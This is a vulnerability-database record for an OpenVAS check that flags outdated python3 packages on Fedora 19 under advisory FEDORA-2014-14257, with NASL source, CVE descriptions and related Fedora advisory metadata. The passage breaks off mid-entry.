ID OPENVAS:1361412562310868482 Type openvas Reporter Copyright (C) 2014 Greenbone Networks GmbH Modified 2020-03-02T00:00:00
Description
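Check the installed version of python3 on Fedora 19 against the package build named in advisory FEDORA-2014-14257 (python3-3.3.2-10.fc19).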
###############################################################################
# OpenVAS Vulnerability Test
#
# Fedora Update for python3 FEDORA-2014-14257
#
# Authors:
# System Generated Check
#
# Copyright:
# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
# Description phase: register this check's metadata with the scanner, then
# leave before any host-facing logic runs.
if(description)
{
  # Identity and revision stamps for this check.
  script_oid("1.3.6.1.4.1.25623.1.0.868482");
  script_version("2020-03-02T07:51:06+0000");
  script_tag(name:"last_modification", value:"2020-03-02 07:51:06 +0000 (Mon, 02 Mar 2020)");
  script_tag(name:"creation_date", value:"2014-11-14 06:45:26 +0100 (Fri, 14 Nov 2014)");

  # CVE identifiers attached to the advisory. Only one CVSS v2 base score and
  # vector is recorded for the check as a whole; there is no per-CVE breakdown
  # here, so triage of an individual CVE needs its own score.
  script_cve_id("CVE-2014-4650", "CVE-2013-4238", "CVE-2014-4616");
  script_tag(name:"cvss_base", value:"7.5");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");

  # Text shown with a finding.
  script_name("Fedora Update for python3 FEDORA-2014-14257");
  script_tag(name:"summary", value:"Check the version of python3");
  script_tag(name:"vuldetect", value:"Checks if a vulnerable version is present on the target host.");
  script_tag(name:"affected", value:"python3 on Fedora 19");
  script_tag(name:"solution", value:"Please install the updated package(s).");

  # NOTE(review): a "package" detection type suggests the result rests on the
  # installed package version alone, not on probing the running software.
  # Confirm against the scanner's quality-of-detection documentation.
  script_tag(name:"qod_type", value:"package");
  script_tag(name:"solution_type", value:"VendorFix");

  # Advisory references.
  script_xref(name:"FEDORA", value:"2014-14257");
  script_xref(name:"URL", value:"https://lists.fedoraproject.org/pipermail/package-announce/2014-November/143576.html");

  # Scheduling: category, ownership, family and prerequisites.
  script_category(ACT_GATHER_INFO);
  script_copyright("Copyright (C) 2014 Greenbone Networks GmbH");
  script_family("Fedora Local Security Checks");

  # NOTE(review): the ssh/login/* key names suggest the package list comes from
  # an authenticated SSH login performed by gather-package-list.nasl. A host
  # scanned without working credentials would then never reach the comparison,
  # so a missing finding is not evidence of a patched host. Confirm.
  script_dependencies("gather-package-list.nasl");
  script_mandatory_keys("ssh/login/fedora", "ssh/login/rpms", re:"ssh/login/release=FC19");

  # Metadata is registered; stop here.
  exit(0);
}
include("revisions-lib.inc");
include("pkg-lib-rpm.inc");
# Release identifier recorded for the target. With none available there is
# nothing to compare against, so the check ends without a result.
release = rpm_get_ssh_release();
if(!release)
  exit(0);

res = "";

# This advisory applies to Fedora 19 only.
if(release == "FC19")
{
  # NOTE(review): isrpmvuln() lives in pkg-lib-rpm.inc and is not shown here.
  # It presumably returns report text when the installed python3 RPM is older
  # than the build given in rpm: (name~version~release), and NULL otherwise.
  # Confirm there.
  # The verdict comes from the package version string alone; it does not test
  # whether the affected code paths are in use on the host.
  res = isrpmvuln(pkg:"python3", rpm:"python3~3.3.2~10.fc19", rls:"FC19");
  if(res != NULL)
  {
    # Report the outdated package.
    security_message(data:res);
    exit(0);
  }

  # NOTE(review): __pkg_match is not defined in this file. It is presumably set
  # by isrpmvuln() when the package was found, with exit code 99 marking the
  # host as checked and not affected. Confirm in the include and scanner docs.
  if(__pkg_match)
  {
    exit(99);
  }

  # Package not found in the collected list: no verdict either way.
  exit(0);
}
{"id": "OPENVAS:1361412562310868482", "type": "openvas", "bulletinFamily": "scanner", "title": "Fedora Update for python3 FEDORA-2014-14257", "description": "Check the version of python3", "published": "2014-11-14T00:00:00", "modified": "2020-03-02T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868482", "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "references": ["2014-14257", "https://lists.fedoraproject.org/pipermail/package-announce/2014-November/143576.html"], "cvelist": ["CVE-2013-4238", "CVE-2014-4616", "CVE-2014-4650"], "lastseen": "2020-03-03T20:57:02", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-4238", "CVE-2014-4616", "CVE-2014-4650"]}, {"type": "fedora", "idList": ["FEDORA:DB61F60CE102", "FEDORA:F219C21A3D", "FEDORA:79A3360CE877", "FEDORA:7A86F6087662", "FEDORA:E272360D99E0", "FEDORA:2827460D7732", "FEDORA:4FCC221CAB", "FEDORA:AE30560F3A00", "FEDORA:096D7228ED", "FEDORA:B215721F22"]}, {"type": "f5", "idList": ["SOL15638", "F5:K93278412", "F5:K15638"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310842261", "OPENVAS:1361412562310867929", "OPENVAS:1361412562310871501", "OPENVAS:1361412562310868512", "OPENVAS:1361412562310122870", "OPENVAS:1361412562310867987", "OPENVAS:1361412562310868464", "OPENVAS:1361412562310120575", "OPENVAS:1361412562310867978", "OPENVAS:1361412562310122760"]}, {"type": "nessus", "idList": ["FEDORA_2014-14245.NASL", "FEDORA_2014-14208.NASL", "MANDRIVA_MDVSA-2015-076.NASL", "UBUNTU_USN-2653-1.NASL", "FEDORA_2014-14257.NASL", "ORACLELINUX_ELSA-2015-2101.NASL", "REDHAT-RHSA-2015-2101.NASL", "SL_20151119_PYTHON_ON_SL7_X.NASL", "CENTOS_RHSA-2015-2101.NASL", "FEDORA_2014-7772.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13867", "SECURITYVULNS:DOC:31253", "SECURITYVULNS:VULN:13303"]}, {"type": "oraclelinux", "idList": ["ELSA-2013-1582", "ELSA-2015-2101", 
"ELSA-2015-1064"]}, {"type": "ubuntu", "idList": ["USN-2653-1", "USN-1982-1"]}, {"type": "redhat", "idList": ["RHSA-2015:1064", "RHSA-2015:2101", "RHSA-2013:1582"]}, {"type": "centos", "idList": ["CESA-2013:1582", "CESA-2015:2101"]}, {"type": "amazon", "idList": ["ALAS-2014-440", "ALAS-2014-380", "ALAS-2014-374"]}, {"type": "hackerone", "idList": ["H1:12297"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:35A921A81EE6FB28E829D4305BB3A08D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:127241"]}, {"type": "exploitdb", "idList": ["EDB-ID:33894"]}], "modified": "2020-03-03T20:57:02", "rev": 2}, "score": {"value": 6.3, "vector": "NONE", "modified": "2020-03-03T20:57:02", "rev": 2}, "vulnersScore": 6.3}, "pluginID": "1361412562310868482", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for python3 FEDORA-2014-14257\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868482\");\n script_version(\"2020-03-02T07:51:06+0000\");\n script_tag(name:\"last_modification\", value:\"2020-03-02 07:51:06 +0000 (Mon, 02 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-11-14 06:45:26 +0100 (Fri, 14 Nov 2014)\");\n script_cve_id(\"CVE-2014-4650\", \"CVE-2013-4238\", \"CVE-2014-4616\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for python3 FEDORA-2014-14257\");\n script_tag(name:\"summary\", value:\"Check the version of python3\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"python3 on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-14257\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-November/143576.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = 
\"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"python3\", rpm:\"python3~3.3.2~10.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "naslFamily": "Fedora Local Security Checks"}
{"cve": [{"lastseen": "2021-02-02T06:14:31", "description": "Array index error in the scanstring function in the _json module in Python 2.7 through 3.5 and simplejson before 2.6.1 allows context-dependent attackers to read arbitrary process memory via a negative index value in the idx argument to the raw_decode function.", "edition": 6, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.9, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-08-24T20:29:00", "title": "CVE-2014-4616", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4616"], "modified": "2018-10-30T16:27:00", "cpe": ["cpe:/a:python:python:3.4.0", "cpe:/a:python:python:2.7.10", "cpe:/a:python:python:3.0.1", "cpe:/a:python:python:3.4.1", "cpe:/a:python:python:2.7.5", "cpe:/a:python:python:3.1.1", "cpe:/a:python:python:3.5.0", "cpe:/a:python:python:3.4.3", "cpe:/o:opensuse:opensuse:13.1", "cpe:/a:python:python:2.7.0", "cpe:/a:python:python:3.2.0", "cpe:/a:python:python:3.1.2", "cpe:/a:python:python:2.7.6", "cpe:/a:python:python:3.4.2", "cpe:/a:python:python:3.3.4", "cpe:/a:python:python:2.7.3", "cpe:/a:python:python:2.7.9", "cpe:/a:python:python:3.3.6", 
"cpe:/a:python:python:3.3.3", "cpe:/a:python:python:3.3.0", "cpe:/a:python:python:3.0.0", "cpe:/a:python:python:3.1.0", "cpe:/a:python:python:3.3.5", "cpe:/a:python:python:2.7.12", "cpe:/o:opensuse_project:opensuse:12.3", "cpe:/a:python:python:3.4.4", "cpe:/a:python:python:2.7.13", "cpe:/a:python:python:2.7.4", "cpe:/a:python:python:2.7.2", "cpe:/a:python:python:3.2.2", "cpe:/a:python:python:3.2.1", "cpe:/a:python:python:3.2.3", "cpe:/a:python:python:3.3.2", "cpe:/a:python:python:2.7.1", "cpe:/a:python:python:3.1.3", "cpe:/a:python:python:3.4.6", "cpe:/a:python:python:3.1.5", "cpe:/a:python:python:3.2.4", "cpe:/a:python:python:3.4.5", "cpe:/a:python:python:2.7.11", "cpe:/a:python:python:3.1.4", "cpe:/a:python:python:3.2.5", "cpe:/a:python:python:3.4.7", "cpe:/a:python:python:2.7.8", "cpe:/a:python:python:3.2.6", "cpe:/a:python:python:3.3.1", "cpe:/a:python:python:2.7.7"], "id": "CVE-2014-4616", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4616", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:python:python:2.7.10:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.0:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.12:*:*:*:*:*:*:*", 
"cpe:2.3:a:python:python:3.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.5:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.3:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.4.7:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse_project:opensuse:12.3:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.4:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.11:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.6:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.8:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.13:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.9:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.7:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:14:31", "description": "The CGIHTTPServer module in Python 2.7.5 and 3.3.4 does not properly handle URLs in which URL encoding is used for path separators, which allows remote attackers to read script source code or conduct directory traversal attacks and execute unintended code via a crafted character sequence, as demonstrated by a %2f separator.", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, 
"privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-20T17:15:00", "title": "CVE-2014-4650", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4650"], "modified": "2020-02-26T13:49:00", "cpe": ["cpe:/o:redhat:enterprise_linux:5.0", "cpe:/a:python:python:2.7.5", "cpe:/a:python:python:3.3.4", "cpe:/a:redhat:software_collections:-", "cpe:/o:redhat:enterprise_linux:7.0", "cpe:/o:redhat:enterprise_linux:6.0"], "id": "CVE-2014-4650", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4650", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.5:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:software_collections:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:06:55", "description": "The ssl.match_hostname function in the SSL module in Python 2.6 through 3.4 does not properly handle a '\\0' character in a domain name in the Subject Alternative Name field of an X.509 certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority, a related issue to CVE-2009-2408.", 
"edition": 6, "cvss3": {}, "published": "2013-08-18T02:52:00", "title": "CVE-2013-4238", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4238"], "modified": "2019-10-25T11:53:00", "cpe": ["cpe:/a:python:python:2.6.3", "cpe:/a:python:python:2.6.8", "cpe:/a:python:python:3.0.1", "cpe:/a:python:python:2.7.1150", "cpe:/a:python:python:3.1.1", "cpe:/a:python:python:3.2", "cpe:/a:python:python:2.7.2150", "cpe:/a:python:python:3.1.2", "cpe:/a:python:python:2.6.5", "cpe:/a:python:python:2.7.3", "cpe:/a:python:python:2.6.2", "cpe:/a:python:python:3.1", "cpe:/a:python:python:2.6.6", "cpe:/a:python:python:2.6.7", "cpe:/a:python:python:2.7.2", "cpe:/a:python:python:3.0", "cpe:/o:opensuse:opensuse:11.4", "cpe:/o:canonical:ubuntu_linux:10.04", "cpe:/a:python:python:2.6.2150", "cpe:/a:python:python:3.2.3", "cpe:/a:python:python:3.3", "cpe:/o:opensuse:opensuse:12.2", "cpe:/a:python:python:2.7.1", "cpe:/a:python:python:3.1.3", "cpe:/a:python:python:3.4", "cpe:/a:python:python:3.1.5", "cpe:/a:python:python:2.6.4", "cpe:/a:python:python:2.6.1", "cpe:/a:python:python:3.1.2150", "cpe:/a:python:python:3.1.4", "cpe:/a:python:python:3.2.2150", "cpe:/o:opensuse:opensuse:12.3", "cpe:/a:python:python:2.6.6150"], "id": "CVE-2013-4238", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4238", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:opensuse:opensuse:12.3:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.2:rc1:*:*:*:*:*:*", 
"cpe:2.3:a:python:python:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.3:beta2:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:12.2:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.6.6150:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.1150:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.2150:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:11.4:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.2:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.3:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.1.2150:*:*:*:*:*:x64:*", "cpe:2.3:a:python:python:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.2.2150:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.1150:*:*:*:*:*:x64:*", "cpe:2.3:o:canonical:ubuntu_linux:10.04:-:lts:*:*:*:*:*", "cpe:2.3:a:python:python:3.2:alpha:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.3:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.6.2150:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.4:alpha1:*:*:*:*:*:*"]}], "fedora": [{"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4238", "CVE-2014-4616", "CVE-2014-4650"], "description": "Python 3 is a new version of the language that is incompatible with the 2.x line of releases. 
The language is mostly the same, but many details, especi ally how built-in objects like dictionaries and strings work, have changed considerably, and a lot of deprecated features have finally been removed. ", "modified": "2014-11-13T18:14:28", "published": "2014-11-13T18:14:28", "id": "FEDORA:79A3360CE877", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: python3-3.3.2-10.fc19", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-4616", "CVE-2014-4650"], "description": "Python 3 is a new version of the language that is incompatible with the 2.x line of releases. The language is mostly the same, but many details, especi ally how built-in objects like dictionaries and strings work, have changed considerably, and a lot of deprecated features have finally been removed. ", "modified": "2014-11-09T15:45:22", "published": "2014-11-09T15:45:22", "id": "FEDORA:E272360D99E0", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: python3-3.3.2-18.fc20", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-4616", "CVE-2014-4650"], "description": "Python 3 is a new version of the language that is incompatible with the 2.x line of releases. The language is mostly the same, but many details, especi ally how built-in objects like dictionaries and strings work, have changed considerably, and a lot of deprecated features have finally been removed. 
", "modified": "2014-11-10T06:36:31", "published": "2014-11-10T06:36:31", "id": "FEDORA:AE30560F3A00", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 21 Update: python3-3.4.1-16.fc21", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4238", "CVE-2014-4616"], "description": "Python 3 is a new version of the language that is incompatible with the 2.x line of releases. The language is mostly the same, but many details, especi ally how built-in objects like dictionaries and strings work, have changed considerably, and a lot of deprecated features have finally been removed. ", "modified": "2014-07-17T04:28:18", "published": "2014-07-17T04:28:18", "id": "FEDORA:4FCC221CAB", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: python3-3.3.2-9.fc19", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4238", "CVE-2014-4616"], "description": "Python is an interpreted, interactive, object-oriented programming language often compared to Tcl, Perl, Scheme or Java. Python includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems (X11, Motif, Tk, Mac and MFC). Programmers can write new built-in modules for Python in C or C++. Python can be used as an extension language for applications that need a programmable interface. Note that documentation for Python is provided in the python-docs package. This package provides the \"python\" executable; most of the actual implementation is within the \"python-libs\" package. 
", "modified": "2014-07-17T04:29:36", "published": "2014-07-17T04:29:36", "id": "FEDORA:096D7228ED", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: python-2.7.5-13.fc19", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4238", "CVE-2014-4650"], "description": "Python is an interpreted, interactive, object-oriented programming language often compared to Tcl, Perl, Scheme or Java. Python includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems (X11, Motif, Tk, Mac and MFC). Programmers can write new built-in modules for Python in C or C++. Python can be used as an extension language for applications that need a programmable interface. Note that documentation for Python is provided in the python-docs package. This package provides the \"python\" executable; most of the actual implementation is within the \"python-libs\" package. ", "modified": "2014-11-22T12:44:28", "published": "2014-11-22T12:44:28", "id": "FEDORA:7A86F6087662", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: python-2.7.5-15.fc19", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4238", "CVE-2013-7338", "CVE-2014-2667", "CVE-2014-4650"], "description": "Python 3 is a new version of the language that is incompatible with the 2.x line of releases. The language is mostly the same, but many details, especi ally how built-in objects like dictionaries and strings work, have changed considerably, and a lot of deprecated features have finally been removed. 
", "modified": "2015-01-06T06:16:20", "published": "2015-01-06T06:16:20", "id": "FEDORA:DB61F60CE102", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: python3-3.3.2-11.fc19", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-4616"], "description": "Python is an interpreted, interactive, object-oriented programming language often compared to Tcl, Perl, Scheme or Java. Python includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems (X11, Motif, Tk, Mac and MFC). Programmers can write new built-in modules for Python in C or C++. Python can be used as an extension language for applications that need a programmable interface. Note that documentation for Python is provided in the python-docs package. This package provides the \"python\" executable; most of the actual implementation is within the \"python-libs\" package. ", "modified": "2014-06-30T10:31:50", "published": "2014-06-30T10:31:50", "id": "FEDORA:F219C21A3D", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: 